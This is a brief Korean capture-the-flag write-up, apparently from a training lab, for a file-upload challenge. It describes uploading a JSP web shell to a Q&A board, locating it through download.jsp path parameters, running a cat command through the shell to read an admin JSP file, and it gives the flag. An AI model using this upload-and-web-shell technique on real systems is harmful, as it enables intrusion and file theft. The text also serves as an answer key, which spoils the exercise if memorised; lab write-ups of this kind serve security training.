==================================
* 파일 업로드 문제 09번
==================================
[풀이과정]

1. 풀이 과정
1> QNA 게시판에 jsp 파일을 업로드하고 파일이 존재하는 경로를 확인했다.
다운로드 받는 파일 경로: https://lab.eqst.co.kr:8440/data/download.jsp?filePath=/files/qna/20250725/&fileName=b5f119f9-527b-4326-84cc-4248fc0a2c53.jsp&orgFileName=dd.jsp
파일이 존재하는 경로: 
https://lab.eqst.co.kr:8440/data/download.jsp?filePath=/files/qna/20250725/b5f119f9-527b-4326-84cc-4248fc0a2c53.jsp

웹쉘은 강사님 코드를 사용했다.


2> 플래그 존재 경로
cat%20webapps/admin_site/admin_super.jsp

3> 플래그 확인
	webshell_is_bad
2. 정답
webshell_is_bad
==================================

